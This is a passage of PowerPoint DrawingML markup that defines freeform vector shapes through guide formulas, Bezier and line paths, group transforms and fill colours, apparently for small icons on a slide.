                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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84" name="Freeform 925">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB551F2-6FFC-45A4-A806-5C9E4003DDA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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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85" name="Freeform 926">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E57AA3-18FE-4968-876D-AF7C79A77A9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86" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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86" name="Freeform 927">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6F92EC-9384-496F-89E9-BFC72621FD6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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1"/>
                      </a:cubicBezTo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87" name="Freeform 928">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F544C2-F3A4-468D-AB1E-F0443A7D68A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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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88" name="Freeform 929">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7316EBAB-521A-4C3A-8B4B-8D50C790761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938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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53" name="Group 930">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FAED422-EF5B-447D-B422-5725862C56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85" y="2279"/>
                <a:ext cx="635" cy="270"/>
                <a:chOff x="-1652" y="6058"/>
                <a:chExt cx="2253" cy="954"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2163" name="Freeform 931">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FD27A4E-D746-4C18-9C4D-2946FE110C0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50" y="6058"/>
                  <a:ext cx="451" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 590"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 470 h 590"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 590 h 590"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 123 h 590"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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1" h="590">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="590"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451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64" name="Freeform 932">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53250236-0507-420B-8E08-E15047416B9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752" y="6256"/>
                  <a:ext cx="1353" cy="362"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1353"/>
                    <a:gd name="T1" fmla="*/ 241 h 362"/>
                    <a:gd name="T2" fmla="*/ 902 w 1353"/>
                    <a:gd name="T3" fmla="*/ 0 h 362"/>
                    <a:gd name="T4" fmla="*/ 1353 w 1353"/>
                    <a:gd name="T5" fmla="*/ 121 h 362"/>
                    <a:gd name="T6" fmla="*/ 454 w 1353"/>
                    <a:gd name="T7" fmla="*/ 362 h 362"/>
                    <a:gd name="T8" fmla="*/ 0 w 1353"/>
                    <a:gd name="T9" fmla="*/ 241 h 3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3" h="362">
                      <a:moveTo>
                        <a:pt x="0" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="902" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1353" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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65" name="Freeform 933">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB10619E-9304-45FD-9B42-1035BA28C1B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298" y="6181"/>
                  <a:ext cx="899" cy="708"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 899"/>
                    <a:gd name="T1" fmla="*/ 241 h 708"/>
                    <a:gd name="T2" fmla="*/ 0 w 899"/>
                    <a:gd name="T3" fmla="*/ 708 h 708"/>
                    <a:gd name="T4" fmla="*/ 899 w 899"/>
                    <a:gd name="T5" fmla="*/ 467 h 708"/>
                    <a:gd name="T6" fmla="*/ 899 w 899"/>
                    <a:gd name="T7" fmla="*/ 0 h 708"/>
                    <a:gd name="T8" fmla="*/ 0 w 899"/>
                    <a:gd name="T9" fmla="*/ 241 h 7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99" h="708">
                      <a:moveTo>
                        <a:pt x="0" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="899" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="899" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241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66" name="Freeform 934">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD6EFC9-6114-4DEF-941B-FC31B5D3F56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750" y="6353"/>
                  <a:ext cx="452" cy="536"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 452"/>
                    <a:gd name="T1" fmla="*/ 0 h 536"/>
                    <a:gd name="T2" fmla="*/ 196 w 452"/>
                    <a:gd name="T3" fmla="*/ 196 h 536"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 144 h 536"/>
                    <a:gd name="T6" fmla="*/ 0 w 452"/>
                    <a:gd name="T7" fmla="*/ 416 h 536"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 536 h 536"/>
                    <a:gd name="T10" fmla="*/ 452 w 452"/>
                    <a:gd name="T11" fmla="*/ 69 h 536"/>
                    <a:gd name="T12" fmla="*/ 196 w 452"/>
                    <a:gd name="T13" fmla="*/ 0 h 5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52" h="536">
                      <a:moveTo>
                        <a:pt x="196" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="196" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="416"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19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67" name="Freeform 935">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F1AD85-3BA8-4F2F-B445-84FF5C74B39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554" y="6058"/>
                  <a:ext cx="1155" cy="364"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 707 w 1155"/>
                    <a:gd name="T1" fmla="*/ 0 h 364"/>
                    <a:gd name="T2" fmla="*/ 452 w 1155"/>
                    <a:gd name="T3" fmla="*/ 68 h 364"/>
                    <a:gd name="T4" fmla="*/ 645 w 1155"/>
                    <a:gd name="T5" fmla="*/ 123 h 364"/>
                    <a:gd name="T6" fmla="*/ 0 w 1155"/>
                    <a:gd name="T7" fmla="*/ 295 h 364"/>
                    <a:gd name="T8" fmla="*/ 256 w 1155"/>
                    <a:gd name="T9" fmla="*/ 364 h 364"/>
                    <a:gd name="T10" fmla="*/ 1155 w 1155"/>
                    <a:gd name="T11" fmla="*/ 123 h 364"/>
                    <a:gd name="T12" fmla="*/ 707 w 1155"/>
                    <a:gd name="T13" fmla="*/ 0 h 3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55" h="364">
                      <a:moveTo>
                        <a:pt x="707" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="452" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="645" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="295"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="256" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1155" y="123"/>
                      </a:ln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777777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68" name="Freeform 936">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056D3B0D-F6AC-440F-AA6C-DDE47E5F1AD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1652" y="6233"/>
                  <a:ext cx="454" cy="536"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 454"/>
                    <a:gd name="T1" fmla="*/ 0 h 536"/>
                    <a:gd name="T2" fmla="*/ 258 w 454"/>
                    <a:gd name="T3" fmla="*/ 196 h 536"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 144 h 536"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 415 h 536"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 536 h 536"/>
                    <a:gd name="T10" fmla="*/ 0 w 454"/>
                    <a:gd name="T11" fmla="*/ 68 h 536"/>
                    <a:gd name="T12" fmla="*/ 255 w 454"/>
                    <a:gd name="T13" fmla="*/ 0 h 5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54" h="536">
                      <a:moveTo>
                        <a:pt x="255" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="258" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25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69" name="Freeform 937">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366A136F-7287-4DB4-B654-98C3E4D91D3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1652" y="6377"/>
                  <a:ext cx="1354" cy="363"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T1" fmla="*/ 241 h 363"/>
                    <a:gd name="T2" fmla="*/ 454 w 1354"/>
                    <a:gd name="T3" fmla="*/ 0 h 363"/>
                    <a:gd name="T4" fmla="*/ 0 w 1354"/>
                    <a:gd name="T5" fmla="*/ 120 h 363"/>
                    <a:gd name="T6" fmla="*/ 902 w 1354"/>
                    <a:gd name="T7" fmla="*/ 363 h 363"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 241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4" h="363">
                      <a:moveTo>
                        <a:pt x="1354" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="2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70" name="Freeform 938">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B74B466B-1731-4880-A5AE-C0F42D255F9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1652" y="6233"/>
                  <a:ext cx="1354" cy="309"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1157 w 1354"/>
                    <a:gd name="T1" fmla="*/ 240 h 309"/>
                    <a:gd name="T2" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T3" fmla="*/ 189 h 309"/>
                    <a:gd name="T4" fmla="*/ 1098 w 1354"/>
                    <a:gd name="T5" fmla="*/ 120 h 309"/>
                    <a:gd name="T6" fmla="*/ 900 w 1354"/>
                    <a:gd name="T7" fmla="*/ 172 h 309"/>
                    <a:gd name="T8" fmla="*/ 255 w 1354"/>
                    <a:gd name="T9" fmla="*/ 0 h 309"/>
                    <a:gd name="T10" fmla="*/ 0 w 1354"/>
                    <a:gd name="T11" fmla="*/ 68 h 309"/>
                    <a:gd name="T12" fmla="*/ 902 w 1354"/>
                    <a:gd name="T13" fmla="*/ 309 h 309"/>
                    <a:gd name="T14" fmla="*/ 1157 w 1354"/>
                    <a:gd name="T15" fmla="*/ 240 h 3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54" h="309">
                      <a:moveTo>
                        <a:pt x="1157" y="240"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1354" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1098" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="900" y="172"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1157" y="240"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="777777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71" name="Freeform 939">
                  <a:extLst>
